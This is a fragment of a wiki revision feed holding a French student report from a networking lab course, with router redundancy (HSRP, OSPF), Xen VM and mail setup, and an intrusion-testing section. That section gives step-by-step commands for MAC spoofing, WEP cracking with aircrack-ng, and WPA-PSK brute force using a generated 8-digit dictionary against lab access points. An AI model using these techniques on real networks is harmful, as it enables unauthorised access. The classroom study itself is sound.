&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM&lt;br /&gt;
Country Name (2 letter code) [AU]: FR&lt;br /&gt;
State or Province Name (full name) [Some-State]: Nord&lt;br /&gt;
Locality Name (eg, city) []: Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []: &lt;br /&gt;
Common Name (eg, YOUR name) []: hunt3r.lol&lt;br /&gt;
Email Address []: admin@hunt3r.lol&lt;br /&gt;
A challenge password []: &lt;br /&gt;
An optional company name []:&lt;br /&gt;
Il me génère donc deux fichiers, le .csr et le .key&lt;br /&gt;
J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.&lt;br /&gt;
&lt;br /&gt;
Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23099</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23099"/>
				<updated>2015-11-20T10:44:08Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
